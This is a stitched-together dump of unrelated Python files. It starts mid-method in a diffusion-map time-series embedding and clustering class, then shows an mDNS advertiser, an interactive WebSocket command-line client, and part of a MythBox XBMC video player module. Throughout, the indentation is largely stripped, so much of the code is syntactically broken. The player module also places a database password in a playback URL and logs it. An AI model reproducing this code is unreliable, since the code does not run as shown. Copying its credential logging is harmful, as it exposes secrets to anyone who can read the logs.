subidx = np.arange(self.z_mean.shape[1])
np.random.shuffle(subidx) # shuffle is inplace in python
subidx = subidx[:m] # take a portion of the data
subidx.sort() # sort is also in place ...
# dataref = data(subidx,:)
dataref = data[subidx, :]
##
# Affinity matrix computation
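        # Added note: the loop below evaluates, for each pair (i, j), the quadratic form
        # (data[i] - dataref[j])^T inv_c[:, :, subidx[j]] (data[i] - dataref[j])
        # via the expansion a2 + b2 - 2*ab, with a2 = y^T C^-1 y, b2 = diag(X C^-1 X^T)
        # and ab = X C^-1 y (a Mahalanobis-style squared distance, assuming C^-1 is symmetric).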
print('computing Dis matrix ', end='')
waitbar_increments = m // 10
Dis = np.zeros((M, m))
for j in range(m):
if j % waitbar_increments == 0:
print('.', end='')
tmp1 = self.inv_c[:, :, subidx[j]] @ dataref[j, :].T # 40, in Python
a2 = np.dot(dataref[j, :], tmp1) # a2 is a scalar
b2 = np.sum(data * (self.inv_c[:, :, subidx[j]] @ data.T).T, 1)
ab = data @ tmp1 # only @ works here
# this tiles the matrix ... repmat is like np.tile
# Dis[:,j] = repmat[a2, M, 1] + b2 - 2*ab
Dis[:, j] = (np.tile(a2, [M, 1])).flatten() + b2 - 2 * ab
print('done!')
## Anisotropic kernel
        print('anisotropic kernel ... ', end='')
        ep = np.median(np.median(Dis, 0)) # default scale - should be adjusted for each new realization
A = np.exp(-Dis / (4 * ep))
W_sml = A.T @ A
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1
d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2
D = np.diag(np.sqrt(1 / d2))
###
### Part II
###
# Compute eigenvectors
# in numpy,
# from numpy import linalg as LA
# w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# Compute all eigenvectors and select 10
# [V, E] = eigs(W2, 10) Matlab
# V, E = mh.eig_like_matlab(W2, 10) # think this is correct now ...
# Compute only 10 eigenvectors, must have symmetric matrix
# V, E = mh.eigs_like_matlab(W2,10)
        num_rdims = self.num_rdims
        V, E = mh.eigs_like_matlab(W2, num_rdims)
# print('V.shape', V.shape)
# print('E.shape', E.shape)
# python np.sum(A,0) <=> matlab sum(A)
        # in matlab, srtdE are the values of sum(E) sorted (in descending order)
        # and IE are the indices that sorted them
        # [srtdE, IE] = sort(sum(E), 'descend')
        # this is the python equivalent ... note that IE will have values one less than in MATLAB, because of zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1] # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]
# Phi = D @ V(:, IE(1, 2:10))
Phi = D @ V[:, IE[1:]]
print('done')
###
### Part III
###
# TODO - not necessary? (Independent coordinates?)
# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='')
Psi_list = [] # holds all the psi_i values
omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m]) # omega needed to be shaped as a column
# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
# this line is strange ... order of operations for @?, what is the offset?
psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
# [Psi, psi_i]
Psi_list.append(psi_i)
# convert Psi_list back into an array, shaped like MATLAB version
self.Psi = np.array(Psi_list).T
        # psi may have very small imaginary values ...
# cast to real here, but need to check
self.Psi = np.real(self.Psi)
# print('Psi.shape', Psi.shape)
print('done')
# Since close to a degenerate case - try to rotate according to:
# A. Singer and R. R. Coifman, "Spectral ICA", ACHA 2007.
#
def _clustering(self, numClusters=7, kmns=True, distance_measure=None, nrep=1):
# Cluster embedding and generate figures and output files
# ***************************************************************@
import matplotlib.pyplot as plt
# Configuration
intrinsicDim = self.Dim # can be varied slightly but shouldn't be much larger than Dim
## Clusters
# IDX = kmeans(Psi(:, 1:intrinsicDim), numClusters)
# Python kmeans see
# https://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.cluster.vq.kmeans.html
# scipy.cluster.vq.kmeans(obs, k_or_guess, iter=20, thresh=1e-05)
#
        # note, python expects each ROW to be an observation, looks the same as MATLAB
#
        if kmns:
print('running k-means')
kmeans = KMeans(n_clusters=numClusters).fit(self.Psi[:, :intrinsicDim])
self.IDX = kmeans.labels_
else:
print('calculating distances')
            if distance_measure is None:
print('Euclidean distances used in clustering')
row, col = self.Psi.shape
combined = []
for i1 in range(row):
combined.append(self.Psi[i1, :intrinsicDim])
distmat = calculate_distance_matrix(combined)
else:
#elif (distance_measure == 'dtw'):
print('DTW distances used in clustering')
distmat = self.dtw_distmat
print('sampling initial medoids')
sample_idx = random.sample(range(distmat.shape[0]), numClusters)
initial_medoids = sample_idx
print('running k-medoids')
self.kmeds = kmedoids(distmat, initial_medoids, data_type='distance_matrix')
self.kmeds.process()
temp_idx = np.array(self.kmeds.get_clusters())
final_idx = []
for i1 in range(distmat.shape[0]):
for j1 in range(numClusters):
if (i1 in temp_idx[j1]):
final_idx.append(j1)
self.IDX = np.array(final_idx)
print(self.IDX.shape)
        if distance_measure is not None:
return
# TODO decide how to plot multiple snips
# think that x_ref[1,:] is just
for snip in range(len(self.z)):
if snip == 0:
x = self.z[snip][5, :]
x = x[0:x.shape[0]-self.H]
xref1 = x[::self.stepSize] # downsample, to match the data steps
else:
x = self.z[snip][5, :]
x = x[0:x.shape[0]-self.H]
x = x[::self.stepSize]
xref1 = np.append(xref1, x)
print(xref1.shape)
xs = self.Psi[:, 0]
ys = self.Psi[:, 1]
zs = self.Psi[:, 2]
# normalize these to amplitude one?
print('normalizing amplitudes of Psi in Python ...')
xs /= np.max(np.abs(xs))
ys /= np.max(np.abs(ys))
zs /= np.max(np.abs(zs))
# xs -= np.mean(xs)
# ys -= np.mean(ys)
# zs -= np.mean(zs)
# xs /= np.std(xs)
# ys /= np.std(ys)
# zs /= np.std(zs)
print(xs.shape)
lim = 2000
val = xref1[:lim]
idx = self.IDX[:lim]
plt.figure(figsize=[15, 3])
plt.plot(xref1[:lim], color='black', label='Timeseries')
plt.plot(xs[:lim], linewidth=.5, label='psi_0')
plt.plot(ys[:lim], linewidth=.5, label='psi_1')
plt.plot(zs[:lim], linewidth=.5, label='psi_2')
plt.plot(idx / np.max(idx) + 1, linewidth=.8, label='IDX')
if np.max(self.snip_number[:lim])>0:
plt.plot(self.snip_number[:lim] / np.max(self.snip_number[:lim]) - 2, linewidth=.8, label='Snip Number')
plt.legend()
# rightarrow causes an image error, when displayed in github!
# plt.xlabel('Time $ \\rightarrow $')
plt.xlabel('Time')
plt.ylabel('Value')
# plt.gca().autoscale(enable=True, axis='both', tight=None )
# plt.gca().xaxis.set_ticklabels([])
# plt.gca().yaxis.set_ticklabels([])
plt.title('Example Timeseries and Manifold Projection')
print('done')
###
### additional parsing, for color graphs
###
import matplotlib
cmap = matplotlib.cm.get_cmap('Spectral')
r = xs[:lim]
g = ys[:lim]
b = zs[:lim]
# prevent the jump in data value
r[:self.H] = r[self.H]
g[:self.H] = g[self.H]
b[:self.H] = b[self.H]
r -= np.min(r)
r /= np.max(r)
g -= np.min(g)
g /= np.max(g)
b -= np.min(b)
b /= np.max(b)
plt.figure(figsize=[15, 3])
for i in range(lim - 1):
col = [r[i], g[i], b[i]]
plt.plot([i, i + 1], [val[i], val[i + 1]], color=col)
plt.title('data, colored according to Psi (color three-vector)')
plt.xlabel('Time')
plt.ylabel('Value')
plt.show()
if enable_multiprocessing:
def _histograms_parallel(self, process_pool=None):
n = len(self.z)
hist_bins = mh.histogram_bins_all_snips(self.z, self.nbins)
# JD
            # z_hist = [] # will build up list of histograms, one per snippet
# for z in self.z:
# z is a single snippet here, and self.z is the full list of all snippets
print("Calculating histograms in parallel ... ", end='')
start_time = time.time()
histfunc = partial(workers.histograms, self.z, self.H, self.stepSize, self.N, hist_bins)
pool = process_pool
            if process_pool is None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
results = pool.map(histfunc, range(n), chunksize=5)
            if process_pool is None:
pool.close()
pool.join()
for snip in range(n):
# convert from list back to numpy array
if snip == 0:
self.z_hist = [np.concatenate(results[snip])]
self.snip_number = snip*np.ones(self.z_hist[snip].shape[1])
else:
self.z_hist.append(np.concatenate(results[snip]))
self.snip_number = np.append(self.snip_number,snip*np.ones(self.z_hist[snip].shape[1]))
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
def _covariances_parallel(self, process_pool=None):
#
#
## Configuration
# ncov = 10 # (previous value) size of neighborhood for covariance
# ncov = 40 # size of neighborhood for covariance
# ncov is passed in, above
n = len(self.z_hist)
print("Computing local covariances in parallel ... ", end='')
start_time = time.time()
covfunc = partial(workers.covars, self.z_hist, self.ncov, self.nbins, self.N, self.Dim)
pool = process_pool
            if process_pool is None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
results = pool.map(covfunc, range(n), chunksize=5)
            if process_pool is None:
pool.close()
pool.join()
for snip in range(n):
z_mean, inv_c = results[snip]
# append z_mean and inv_c as next rows of mat
if snip == 0:
self.z_mean = z_mean
self.inv_c = inv_c
else:
self.z_mean = np.append(self.z_mean, z_mean, axis=1)
self.inv_c = np.append(self.inv_c, inv_c, axis=2)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
def _embedding_parallel(self, process_pool=None):
###
### Part I
###
## Configuration
# the variable m defines some subset of the data, to make computation faster;
# this could be various values (10% of the data, all the data, etc.), as long
# as it is not GREATER than the length of data.
# For the smallest change, setting to min 4000 or the data size
# m = 4000 # starting point for sequential processing/extension
#
            # TODO - m allows you to sample various sections of the manifold, rather than looking at
# all points to all points
# the random points can come from the different chunks as well?
# ... for ease of coding, the datastructure could be back to 2D data
m = np.min((4000, self.z_mean.shape[1]))
print('using', m, 'for variable m')
data = self.z_mean.T # set the means as the input set
M = data.shape[0]
# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
# subidx = sort(randperm(size(z_mean, 2), m))
            # Choose first m examples as reference (commented out; don't do this)
# subidx = 1:m;
subidx = np.arange(self.z_mean.shape[1])
np.random.shuffle(subidx) # shuffle is inplace in python
subidx = subidx[:m] # take a portion of the data
subidx.sort() # sort is also in place ...
# dataref = data(subidx,:)
dataref = data[subidx, :]
##
# Affinity matrix computation
Dis = np.zeros((M, m))
print('computing Dis matrix in parallel')
start_time = time.time()
pool = process_pool
            if process_pool is None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
if sys.version_info >= (3,8,0):
print('Python version is >= 3.8, using shared memory')
from multiprocessing import shared_memory
#create shared memory for numpy arrays
shm_inv_c = shared_memory.SharedMemory(name='inv_c',
create=True, size=self.inv_c.nbytes)
shm_subidx = shared_memory.SharedMemory(name='subidx',
create=True, size=subidx.nbytes)
shm_dataref = shared_memory.SharedMemory(name='dataref',
create=True, size=dataref.nbytes)
shm_data = shared_memory.SharedMemory(name='data',
create=True, size=data.nbytes)
shm_result = shared_memory.SharedMemory(name='dis',
create=True, size=Dis.nbytes)
#copy arrays into shared memory
inv_c_copy = np.ndarray(self.inv_c.shape, self.inv_c.dtype, buffer=shm_inv_c.buf)
np.copyto(inv_c_copy, self.inv_c, casting='no')
subidx_copy = np.ndarray(subidx.shape, subidx.dtype, buffer=shm_subidx.buf)
np.copyto(subidx_copy, subidx, casting='no')
dataref_copy = np.ndarray(dataref.shape, dataref.dtype, buffer=shm_dataref.buf)
np.copyto(dataref_copy, dataref, casting='no')
data_copy = np.ndarray(data.shape, data.dtype, buffer=shm_data.buf)
np.copyto(data_copy, data, casting='no')
#use pool to run function in parallel
func = partial(workers.dis_shm, inv_c_copy.shape, inv_c_copy.dtype,
subidx_copy.shape, subidx_copy.dtype,
dataref_copy.shape, dataref_copy.dtype,
data_copy.shape, data_copy.dtype,
Dis.shape, Dis.dtype, M)
#build starmap iterable
arr = []
cpu_count = os.cpu_count()
step = m//cpu_count
start = 0
for i in range(cpu_count-1):
arr.append((step, start))
start = start + step
arr.append((m - start, start))
#run function in parallel
pool.starmap(func, arr)
                if process_pool is None:
pool.close()
pool.join()
#copy results out of shared memory
Dis_copy = np.ndarray(Dis.shape, Dis.dtype, buffer=shm_result.buf)
np.copyto(Dis, Dis_copy, casting='no')
del inv_c_copy
del subidx_copy
del dataref_copy
del data_copy
del Dis_copy
#close and cleanup shared memory
shm_inv_c.close()
shm_inv_c.unlink()
shm_subidx.close()
shm_subidx.unlink()
shm_dataref.close()
shm_dataref.unlink()
shm_data.close()
shm_data.unlink()
shm_result.close()
shm_result.unlink()
else:
# without shared memory, each worker process will use ~700MB of RAM.
# with it, they will use ~100MB each
print('Python version is < 3.8, cannot use shared memory. Beware of high memory usage')
dis = partial(workers.dis, self.inv_c, subidx, dataref, data, M)
results = pool.map(dis, range(m), chunksize=m//os.cpu_count())
                if process_pool is None:
pool.close()
pool.join()
for j in range(m):
Dis[:, j] = results[j]
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
## Anisotropic kernel
            print('anisotropic kernel ... ', end='')
            ep = np.median(np.median(Dis, 0)) # default scale - should be adjusted for each new realization
A = np.exp(-Dis / (4 * ep))
W_sml = A.T @ A
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1
d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2
D = np.diag(np.sqrt(1 / d2))
###
### Part II
###
# Compute eigenvectors
# in numpy,
# from numpy import linalg as LA
# w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# Compute all eigenvectors and select 10
# [V, E] = eigs(W2, 10) Matlab
# V, E = mh.eig_like_matlab(W2, 10) # think this is correct now ...
# Compute only 10 eigenvectors, must have symmetric matrix
# V, E = mh.eigs_like_matlab(W2,10)
            num_rdims = self.num_rdims
            V, E = mh.eigs_like_matlab(W2, num_rdims)
# print('V.shape', V.shape)
# print('E.shape', E.shape)
# python np.sum(A,0) <=> matlab sum(A)
            # in matlab, srtdE are the values of sum(E) sorted (in descending order)
            # and IE are the indices that sorted them
            # [srtdE, IE] = sort(sum(E), 'descend')
            # this is the python equivalent ... note that IE will have values one less than in MATLAB, because of zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1] # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]
# Phi = D @ V(:, IE(1, 2:10))
Phi = D @ V[:, IE[1:]]
print('done')
###
### Part III
###
# TODO - not necessary? (Independent coordinates?)
# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='')
Psi_list = [] # holds all the psi_i values
omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m]) # omega needed to be shaped as a column
# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
# this line is strange ... order of operations for @?, what is the offset?
psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
# [Psi, psi_i]
Psi_list.append(psi_i)
# convert Psi_list back into an array, shaped like MATLAB version
self.Psi = np.array(Psi_list).T
            # psi may have very small imaginary values ...
# cast to real here, but need to check
self.Psi = np.real(self.Psi)
# print('Psi.shape', Psi.shape)
print('done')
#data must be passed as numpy array of snippets or windows
def dtw_matrix_parallel(self, data, process_pool=None):
            if sys.version_info < (3, 8, 0):
                print('Python version is < 3.8, cannot use shared memory. Aborting')
                raise RuntimeError('dtw_matrix_parallel requires Python >= 3.8 for shared memory')
print('computing dtw matrix in parallel')
start_time = time.time()
pool = process_pool
            if process_pool is None:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))
#process_list = []
#m = Manager()
#lock = m.Lock()
self.dtw_distmat = np.zeros((data.shape[0], data.shape[0]))
print('Python version is >= 3.8, using shared memory')
from multiprocessing import shared_memory
#create shared memory for numpy arrays
#print(data.nbytes)
#print(self.dtw_distmat.nbytes)
shm_data = shared_memory.SharedMemory(name='dtw_data',
create=True, size=data.nbytes)
shm_result = shared_memory.SharedMemory(name='dtw_result',
create=True, size=self.dtw_distmat.nbytes)
#copy arrays into shared memory
data_copy = np.ndarray(data.shape, data.dtype, buffer=shm_data.buf)
np.copyto(data_copy, data, casting='no')
self.dtw_distmat = np.zeros((data.shape[0], data.shape[0]))
result = np.ndarray(self.dtw_distmat.shape, self.dtw_distmat.dtype, buffer=shm_result.buf)
#use pool to run function in parallel
func = partial(workers.dtw_shm, data_copy.shape, data_copy.dtype,
result.shape, result.dtype)
#build starmap iterable
cpu_count = os.cpu_count()
n = self.dtw_distmat.shape[0]
each = n*n/float(os.cpu_count())
arr = [(0, int(math.sqrt(each)))]
for i in range(2, os.cpu_count()):
arr.append((arr[-1][1], int(math.sqrt(each*i))))
arr.append((arr[-1][1], n))
#run function in parallel
#for args in arr:
# p = Process(target=func, args=args)
# process_list.append(p)
# print("starting process from ", args[0], " to ", args[1])
# p.start()
#for p in process_list:
# print("joining process")
# p.join()
pool.starmap(func, arr)
print("done processing dtw")
            if process_pool is None:
pool.close()
pool.join()
#copy results out of shared memory
np.copyto(self.dtw_distmat, result, casting='no')
del data_copy
del result
#close and cleanup shared memory
shm_data.close()
shm_data.unlink()
shm_result.close()
shm_result.unlink()
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
return self.dtw_distmat
|
mdns_advertiser.py
|
#!/usr/bin/env python
import logging
import socket
import time
import threading
import netifaces as ni
from zeroconf import ServiceInfo, Zeroconf
logger = logging.getLogger(__name__)
class MDNSAdvertiser(object):
def __init__(self, type_, name, port, properties, server, interface):
self.type = type_
self.name = name
self.interface = interface if interface else "eth0"
        self.address = self.get_network_ip_address(self.interface)
self.port = port
self.properties = properties
self.server = server if server else socket.gethostname()
self.service = None
self.advertiser_thread = None
self.connectivity_thread = None
self.alive = None
@staticmethod
def get_network_ip_address(interface='eth0'):
"""
Get the first IP address of a network interface.
:param interface: The name of the interface.
:return: The IP address.
"""
if interface not in ni.interfaces():
logger.error('Could not find interface {}.'.format(interface))
return None
        addresses = ni.ifaddresses(interface)
        if (ni.AF_INET not in addresses) or (len(addresses[ni.AF_INET]) == 0):
            logger.warning('Could not find IP of interface {}.'.format(interface))
            return None
        return addresses[ni.AF_INET][0]['addr']
def start(self):
self.alive = True
self.connectivity_thread = threading.Thread(target=self.__check_connectivity)
self.connectivity_thread.setDaemon(1)
self.connectivity_thread.start()
def stop(self):
if self.alive:
self.alive = False
if self.connectivity_thread:
self.connectivity_thread.join()
if self.advertiser_thread:
self.advertiser_thread.join()
logger.debug("mDNS advertiser stopped")
def __check_connectivity(self):
while self.alive and not self.address:
self.address = self.get_network_ip_address(self.interface)
time.sleep(1)
if self.alive:
self.advertiser_thread = threading.Thread(target=self.__start_advertising)
self.advertiser_thread.setDaemon(1)
self.advertiser_thread.start()
logger.debug("mDNS advertiser started")
def __start_advertising(self):
self.service = ServiceInfo("{}._tcp.local.".format(self.type),
"{}.{}._tcp.local.".format(self.name, self.type),
port=self.port,
weight=0,
priority=0,
properties=self.properties,
server="{}.local.".format(self.server),
addresses=[socket.inet_aton(self.address)])
zeroconf = Zeroconf()
zeroconf.register_service(self.service)
while self.alive:
time.sleep(.5)
zeroconf.unregister_service(self.service)
zeroconf.close()
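# Example usage sketch (illustrative values only; not part of the original module):
#
#   advertiser = MDNSAdvertiser("_http", "my-device", 8080,
#                               {"path": "/"}, None, "eth0")
#   advertiser.start()
#   ...
#   advertiser.stop()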
|
__main__.py
|
import argparse
import asyncio
import os
import signal
import sys
import threading
import websockets
from websockets.exceptions import format_close
def win_enable_vt100():
"""
Enable VT-100 for console output on Windows.
See also https://bugs.python.org/issue29059.
"""
import ctypes
STD_OUTPUT_HANDLE = ctypes.c_uint(-11)
INVALID_HANDLE_VALUE = ctypes.c_uint(-1)
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x004
handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
if handle == INVALID_HANDLE_VALUE:
raise RuntimeError("Unable to obtain stdout handle")
cur_mode = ctypes.c_uint()
if ctypes.windll.kernel32.GetConsoleMode(handle, ctypes.byref(cur_mode)) == 0:
raise RuntimeError("Unable to query current console mode")
# ctypes ints lack support for the required bit-OR operation.
# Temporarily convert to Py int, do the OR and convert back.
py_int_mode = int.from_bytes(cur_mode, sys.byteorder)
new_mode = ctypes.c_uint(py_int_mode | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
if ctypes.windll.kernel32.SetConsoleMode(handle, new_mode) == 0:
raise RuntimeError("Unable to set console mode")
def exit_from_event_loop_thread(loop, stop):
loop.stop()
if not stop.done():
# When exiting the thread that runs the event loop, raise
        # KeyboardInterrupt in the main thread to exit the program.
try:
ctrl_c = signal.CTRL_C_EVENT # Windows
except AttributeError:
ctrl_c = signal.SIGINT # POSIX
os.kill(os.getpid(), ctrl_c)
def print_during_input(string):
sys.stdout.write(
(
# Save cursor position
"\N{ESC}7"
# Add a new line
"\N{LINE FEED}"
# Move cursor up
"\N{ESC}[A"
# Insert blank line, scroll last line down
"\N{ESC}[L"
# Print string in the inserted blank line
"{string}\N{LINE FEED}"
# Restore cursor position
"\N{ESC}8"
# Move cursor down
"\N{ESC}[B"
).format(string=string)
)
sys.stdout.flush()
def print_over_input(string):
sys.stdout.write(
(
# Move cursor to beginning of line
"\N{CARRIAGE RETURN}"
# Delete current line
"\N{ESC}[K"
# Print string
"{string}\N{LINE FEED}"
).format(string=string)
)
sys.stdout.flush()
async def run_client(uri, loop, inputs, stop):
try:
websocket = await websockets.connect(uri)
except Exception as exc:
print_over_input("Failed to connect to {}: {}.".format(uri, exc))
exit_from_event_loop_thread(loop, stop)
return
else:
print_during_input("Connected to {}.".format(uri))
try:
while True:
incoming = asyncio.ensure_future(websocket.recv())
outgoing = asyncio.ensure_future(inputs.get())
done, pending = await asyncio.wait(
[incoming, outgoing, stop], return_when=asyncio.FIRST_COMPLETED
)
# Cancel pending tasks to avoid leaking them.
if incoming in pending:
incoming.cancel()
if outgoing in pending:
outgoing.cancel()
if incoming in done:
try:
message = incoming.result()
except websockets.ConnectionClosed:
break
else:
print_during_input("< " + message)
if outgoing in done:
message = outgoing.result()
await websocket.send(message)
if stop in done:
break
finally:
await websocket.close()
close_status = format_close(websocket.close_code, websocket.close_reason)
print_over_input(
"Connection closed: {close_status}.".format(close_status=close_status)
)
exit_from_event_loop_thread(loop, stop)
def main():
# If we're on Windows, enable VT100 terminal support.
if os.name == "nt":
try:
win_enable_vt100()
except RuntimeError as exc:
sys.stderr.write(
(
"Unable to set terminal to VT100 mode. This is only "
"supported since Win10 anniversary update. Expect "
"weird symbols on the terminal.\nError: {exc!s}\n"
).format(exc=exc)
)
sys.stderr.flush()
try:
import readline # noqa
except ImportError: # Windows has no `readline` normally
pass
# Parse command line arguments.
parser = argparse.ArgumentParser(
prog="python -m websockets",
description="Interactive WebSocket client.",
add_help=False,
)
parser.add_argument("uri", metavar="<uri>")
args = parser.parse_args()
# Create an event loop that will run in a background thread.
loop = asyncio.new_event_loop()
# Create a queue of user inputs. There's no need to limit its size.
inputs = asyncio.Queue(loop=loop)
# Create a stop condition when receiving SIGINT or SIGTERM.
stop = asyncio.Future(loop=loop)
# Schedule the task that will manage the connection.
asyncio.ensure_future(run_client(args.uri, loop, inputs, stop), loop=loop)
# Start the event loop in a background thread.
thread = threading.Thread(target=loop.run_forever)
thread.start()
# Read from stdin in the main thread in order to receive signals.
try:
while True:
# Since there's no size limit, put_nowait is identical to put.
message = input("> ")
loop.call_soon_threadsafe(inputs.put_nowait, message)
except (KeyboardInterrupt, EOFError): # ^C, ^D
loop.call_soon_threadsafe(stop.set_result, None)
# Wait for the event loop to terminate.
thread.join()
if __name__ == "__main__":
main()
|
player.py
|
#
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2011 analogue@yahoo.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import copy
import logging
import os
import threading
import time
import xbmc
import xbmcgui
import mythbox.msg as m
import mythbox.ui.toolkit as toolkit
from mythbox.ui.toolkit import showPopup
from mythbox.util import formatSeconds, BoundedEvictingQueue, safe_str, catchall
from mythbox.mythtv.db import inject_db
log = logging.getLogger('mythbox.ui')
mlog = logging.getLogger('mythbox.method')
mythPlayer = None
# Interval in millis to sleep when we're waiting around for
# async xbmc events to complete
SLEEP_MILLIS = 250
class BasePlayer(xbmc.Player):
def __init__(self, *args, **kwargs):
xbmc.Player.__init__(self, *args, **kwargs)
self.active = True
self.tracker = PositionTracker(self)
def buildPlaybackUrl(self):
raise Exception('Abstract method')
def buildPlayList(self):
raise Exception('Abstract method')
def playRecording(self, commSkipper):
raise Exception('Abstract method')
@catchall
def onPlayBackStarted(self):
if self.active:
log.debug('> base:onPlayBackStarted %s' % self)
for target in (self.bookmarker, self.tracker, self.commSkipper):
try:
target.onPlayBackStarted()
except:
log.exception('onPlayBackStarted')
log.debug('< base:onPlayBackStarted %s' % self)
def onPlayBackStopped(self):
if self.active:
self.active = False
log.debug('> onPlayBackStopped')
for target in (self.tracker, self.commSkipper, self.bookmarker):
try:
target.onPlayBackStopped()
except:
log.exception('onPlayBackStopped')
log.debug('< onPlayBackStopped')
def onPlayBackEnded(self):
if self.active:
self.active = False
log.debug('> onPlayBackEnded')
for target in (self.tracker, self.commSkipper, self.bookmarker):
try:
target.onPlayBackEnded()
except:
log.exception('onPlayBackStopped')
log.debug('< onPlayBackEnded')
class MountedPlayer(BasePlayer):
'''Plays mythtv recordings with support for bookmarks, commercial skipping, etc'''
def __init__(self, *args, **kwargs):
BasePlayer.__init__(self, *args, **kwargs)
[setattr(self,k,v) for k,v in kwargs.iteritems() if k in ('translator', 'mythThumbnailCache', 'program', 'platform')]
self.bookmarker = MythBookmarker(self, self.program, self.translator)
self._playbackCompletedLock = threading.Event()
self._playbackCompletedLock.clear()
def buildPlaybackUrl(self):
return self.program.getLocalPath()
def playRecording(self, commSkipper):
"""
Plays the given program. Blocks until playback is stopped or until the
end of the recording is reached
"""
mlog.debug('> playRecording(%s)' % safe_str(self.program.title()))
assert not self.isPlaying(), 'Player is already playing a video'
self.commSkipper = commSkipper
self.play(self.buildPlaybackUrl(), self.buildPlayList(), windowed=False)
self.waitForPlaybackCompleted()
self.active = False
mlog.debug('< playRecording(...)')
# Callbacks ---------------------------------------------------------------
@catchall
def onPlayBackStopped(self):
if self.active:
try:
super(MountedPlayer, self).onPlayBackStopped()
finally:
self._playbackCompletedLock.set()
@catchall
def onPlayBackEnded(self):
if self.active:
try:
super(MountedPlayer, self).onPlayBackEnded()
finally:
self._playbackCompletedLock.set()
# Private -----------------------------------------------------------------
def waitForPlaybackCompleted(self):
while not self._playbackCompletedLock.isSet():
#log.debug('Waiting for playback completed...')
xbmc.sleep(SLEEP_MILLIS)
def buildPlayList(self):
mlog.debug("> _buildPlayList")
playlistItem = xbmcgui.ListItem()
title = self.program.fullTitle()
comms = self.program.getCommercials()
if len(comms) > 0:
title += '(%s breaks - %s)' % (len(comms), ', '.join(map(lambda c: formatSeconds(c.start), comms)))
playlistItem.setInfo(
"video", {
"Genre" : self.program.category(),
"Studio" : self.program.formattedChannel(),
"Title" : title,
"Plot" : self.program.formattedDescription()
})
# TODO: Set start offset if a comm break starts at 0.0
# playlistItem.setProperty('StartOffset', '256.4')
mlog.debug("< _buildPlayList")
return playlistItem
class StreamingPlayer(BasePlayer):
"""Use xbmcs built in myth support to stream the recording over the network."""
def __init__(self, *args, **kwargs):
BasePlayer.__init__(self, *args, **kwargs)
[setattr(self,k,v) for k,v in kwargs.iteritems() if k in ('settings', 'translator', 'mythThumbnailCache', 'program', 'platform')]
self.bookmarker = MythBookmarker(self, self.program, self.translator)
@inject_db
def buildPlaybackUrl(self):
backend = self.db().toBackend(self.program.hostname())
# myth://dbuser:dbpassword@mythbackend_hostname:mythbackend_port/recordings/filename.mpg
url = 'myth://%s:%s@%s:%s/recordings/%s' % (
self.settings.get('mysql_database'),
self.settings.get('mysql_password'),
backend.ipAddress,
backend.port,
self.program.getBareFilename())
log.debug('Playback url: %s' % url)
return url
def playRecording(self, commSkipper):
"""
Plays the given program. Blocks until playback is stopped or until the
end of the recording is reached
"""
mlog.debug('> playRecording %s' % safe_str(self.program.title()))
assert not self.isPlaying(), 'Player is already playing a video'
self.commSkipper = commSkipper
self.play(self.buildPlaybackUrl(), self.buildPlayList())
mlog.debug('< playRecording')
def buildPlayList(self):
playlistItem = xbmcgui.ListItem()
comms = self.program.getCommercials()
title = self.program.fullTitle()
if len(comms) > 0:
# times are invalid when streaming so only show cardinality
title += u' (%d breaks)' % len(comms)
playlistItem.setInfo(
"video", {
"Genre" : self.program.category(),
"Studio" : self.program.formattedChannel(),
"Title" : title,
"Plot" : self.program.formattedDescription()
})
return playlistItem
class Bookmarker(object):
pass
class XbmcBookmarker(Bookmarker):
'''When using a myth:// style URL for playback, defer to XBMC's built in
    resume from last position functionality'''
def __init__(self, *args, **kwargs):
pass
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
class MythBookmarker(Bookmarker):
